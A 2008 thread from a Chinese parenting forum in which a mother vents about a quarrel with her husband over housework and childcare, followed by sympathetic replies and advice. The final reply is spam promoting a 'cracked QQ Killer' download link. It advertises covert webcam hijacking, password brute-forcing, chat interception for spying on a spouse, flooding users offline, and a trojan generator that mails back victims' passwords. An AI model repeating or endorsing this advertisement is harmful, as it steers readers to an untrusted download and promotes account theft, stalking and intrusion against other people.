要孩子,上播种网
首页 bozhong logo
播种网 论坛 女人心情

又吵架了,好烦心.

30758 楼主
谢谢亲的鼓励,爱你!
已邀请用户 : (此提示只有您可以看到,其他用户无法查看)

已经有段时间没有吵架了,可昨天又开始了.昨天星期天,我在家带孩子,一个人抱,一个人还要洗衣做饭,拖地.到了晚上老公下班回来了,回来的时候心情还好,可等饭吃好,我带孩子去洗澡,等洗完澡出来,老公闷着抽烟,一句话也没有对我说,饭碗放在桌上,他就自故看电视去了,那我也没有理他,只问了下你怎么了?他没有回答我.后来我把碗洗好,再去洗衣服,囡就放在他旁边,等我衣服洗了一半,囡叫了,可他躺在地上一动也不动,随囡叫,我也不去理他们,匆忙的把衣服洗了.后来我叫他去房里睡,他去了.在房里,我看他这么累,这说明天叫你妈过来这里住吧,我让他打电话,他说不打,叫 我打好了,因为以前种种也有过吵过,我说你打好,后来他就说了句,她喜欢在老家住几天又咱了,你这么会安排别人的呀,我脑晕了下,我的在为了他考虑,可他就这样说我,后来就大吵开了.我现在真的有种没有什么话好跟他说,他呢有话也要我先开口的那种,可能我的爱已经无味了,可能过不了多久,....

每次说话总是说我把他当什么了,我心里有数,我做过什么事了,我心里有数.

可是自己行的端,坐的正.

点击查看全文
七级宝宝 | 发表于 2008-7-28 08:29

楼主抱抱,一样的处境,真不明白为什么有了孩子不是我们期望的天伦之乐,而是一个接一个的麻烦em29 

点击查看全文
呆呆妈妈 (楼主)
五级宝宝 | 发表于 2008-7-28 08:40

我的烦心真的好多,可以写成一本书了,可是自己 的文笔不好.

点击查看全文
四级宝宝 | 发表于 2008-7-28 09:03

囡念什么?什么意思?em28 

点击查看全文
呆呆妈妈 (楼主)
五级宝宝 | 发表于 2008-7-28 09:18

就是女儿的意思啦

点击查看全文
九级宝宝 | 发表于 2008-7-28 11:04

我们这叫nan,我女儿也叫囡囡

点击查看全文
十二级宝宝 | 发表于 2008-7-28 13:26

晕倒,你做饭,他就得洗碗,你洗衣服,他就得看孩子,凭什么你什么都干,他什么都不干呀,那你这个婚结的有什么意思呀!你们要好好沟通沟通了!em40 

点击查看全文
九级宝宝 | 发表于 2008-7-28 15:04

找个保姆或小时工帮你做家务吧!他不心疼你,你就不心疼他的钱!让他心痛着去!

点击查看全文
一级宝宝 | 发表于 2008-7-28 17:41

最新QQ杀手2008版破解版下载地址: http://www.qqshashou.net.cn/ip/?107246.html

软件功能:腾讯QQ升级到2008版,以前各种软件均告失效。经过几位专家日以继夜地研究开发,QQ杀手2008新春版终于得以面 世。 本软件集成十大超强功能于一身。奉献给网友。

一:强制视频功能
    该功能利用远程协议发送伪数据包指令,利用QQ自身漏洞控制操作系统摄相头驱动。后台调用开启摄相头, 摄相头指示灯亮。你就可 以看到芳容了。而对方却并不知情。

二:暴力破解QQ密码
    暴力破解就是采取穷举法,用已有字典逐条测试,直至获得正确密码为止。理论上是没有破解不出的密码。 密码越简单越容易破解,越 复杂越难破解。本软件采取对密码特殊计算法从而加快破解速度。密码为生日 形式只需要10分钟就能破解。密码为7位纯数字只需要 1个小时。数字加字母则需要更长时间。

三:发送QQ洪水消息如果你很讨厌某个无聊的人,你可以对他进行惩治。不断发送信息,瞬间满屏。希望点到为止。

四:查看好友IP地址
    有了这个功能你就不必安装显IPQQ版本了。轻松查看该QQ的IP所在的省份和市县,数据库IP地址已经精确 到某网吧了。

五:聊天记录监视
    本软件会自动截获数据包,经过解密抽出显示出来。有了此功能,你就可以监视你的老婆或老公是不是在网 上被人泡还是在泡仔了 。他(她)的举动无所遁形。逃不出你的五指山。

六:破解QQ相册密码
    有时你想看看某位美女的庐山真面目,可她偏偏给相册加个密码。真是一件憾事。在输入框里输入你想要查看 相册的QQ号码,然后点 击破解QQ相册密码,然后再打开她的QQ相册,将自动跳过密码。想怎么看就怎么看。

七:自动互踩QQ空间
    输入你的QQ号,点"自动互踩QQ空间"。程序就开始随机踩你QQ上的好友的QQ空间,从而提升空间人气。

八:强制对方掉线
    软件会模拟QQ正常数据包,大量数据包发送到对方计算机上使电脑死机。请慎重使用。

九:生成QQ木马大盗
    本功能不是去盗号。但是如果自己的号码被盗,忘记了密码保护,又申诉不回来时使用。点击生成QQ木马大 盗,会生成两个文件,一个是qq。ASP文件,一个是qq。exe程序。两种可以分开用。把QQ。exe发送给对方运行即可,密码会通过QQ消息发送给你。如果你有网站的话,把QQ。asp上传到网上让别人浏览那个网页。密码 会发到你预先设置的邮箱里。

十:不加好友,强制与对方聊天
   软件可以像QQ一样最小化到系统托盘里,不影响上网。

QQ杀手2008版破解版下载地址: http://www.qqshashou.net.cn/ip/?107246.html

点击查看全文